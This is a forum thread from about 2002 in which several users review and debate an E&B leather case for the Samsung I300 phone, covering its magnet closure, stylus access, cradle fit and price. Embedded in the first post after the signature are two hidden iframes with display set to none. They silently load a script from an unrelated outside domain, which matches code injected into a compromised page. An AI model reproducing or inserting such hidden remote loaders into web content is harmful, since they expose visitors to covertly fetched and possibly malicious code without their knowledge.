+ Reply to Thread

Thread: E&B Case Pics

Red face E&B Case Pics

Hey

Just got my E&B Case. Well, I start with the bad news. The magnet that keeps the flip closes is not strong enough. It should have been heavy duty velcro or better yet button snaps. The stylus is sort of difficult to get to, I don't know why E&B didn't make a small cut out to make it easier to get to. The plastic over the shortcut buttons might as well not be there, it's worthless. It claims to be syncable in the case, but it will NOT fit the charger, no matter how hard you try. I also thought the E&B metal logo on the bottom right corner would have been chrome. I honesntly don't think it was worth the 45$ I paid for it (with the clip) but it seems to be the best case for the I300, even with its little quirks. Here are some pics if you don't have one yet.

Hope this helps. The pics suck, they were taken from my 3Com web cam.

-Jason<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Last edited by Erby; 01-18-2002 at 07:42 PM.
    -Erby

Thanks Erby! Those are the pics I needed to see. I'm going to stick it out and hope my guy continues with plans.

They don't claim it can sync in the case. From their website:

Hot-Sync it without removing it from the case (requires a hotsync cable), or simply slide it out of the case and place it on the cradle.

Administrator

Arrow

just like watching food comercials.. they look dan good on tv, but when you finally get to see the food in person.. your let down...

these "real world" pics make put the case in a different light.. it seems that i just may stick it out after all.... the case just wasnt what i thought after all...

maybe ill look for one on ebay...

hey jason, can you get to the buttons on both sides of the phone okay?
    thanks
    tim

Marc and Orange,

What do you guys see in the pics that you don't like? They look fine to me but maybe that's because I have the case in front of me and I'm seeing my case in the pics, not what the pics are actually showing (or maybe I'm just blind ). But I can assure you the case is very much keeping in the style/functionality/quality of most other E&B cases. The leather is of very high quality and the fit is perfect! And I disagree on the magents that hold the lid closed being too weak...they work just fine for me. I wouldn't want them too strong anyways, last thing I need is to be struggling trying to pry open the lid when the phone is ringing. With the current magnets, I can just use my thumb and flip open the lid like it was a flip phone and I've never had the lid pop open unexpectedly. As for the plastic, I think that's personal preference. Personally, I think I am going to cut it out just because I don't feel its necessary but others may want that extra protection. I think you'll also find almost everything else was done with great attention to detail in making this case. I, like you guys, have owned obviously the included case, the Sprint one, and the Samsung one, and the target ones and this case puts those to shame and then some IMO, the case is definitely worth the $45 and if I hadn't gotten mine for free, I would have put down the money in a heartbeat. With the exception of the flip lid for you Marc, I don't think you guys will be disappointed with this case. And if you buy the case and don't like it, return it. But I really think you all should give this case a try...

User ***** Rulz Enforcer

comparison

i'm still looking for comparitive pics...

the phone in the original case , and the phone in the e/b case.. standing up, on the side,,

i'd like to see the difference...

tia

chris

Marty, I just really see the lid as extra here. I am very impressed with the case, however. The tight fit that has been talked about is especially tempting. I know cutting the lid off is a simple remedy, but am thinking on it at this point.

Tim

I can get to the side buttons just fine. No problem there.

As for wanting to see the side-by-side pics of the E&B and the orignal case: The orignal "case" provided with the phone is crap. Even with the E&B quirks and little problems, it is by FAR the better case out there. I don't think its worth wasting time taking pics over this.

I plan on getting an extended battery as soon as I can find one for a good price on eBay or somewhere. Hope it will fit ok with the E&B case.

-Jason
    -Erby

More Pics?"

Hey

If anyone wants some more specific pics of the case, let me know, I will take some for ya.

Jason
    -Erby

where is the cheapest place to buy the case at?
    thanks
    tim

www.ebcases.com is the website for E&B. You may luck out and find one on Ebay, but the company pretty much markets these exclusively.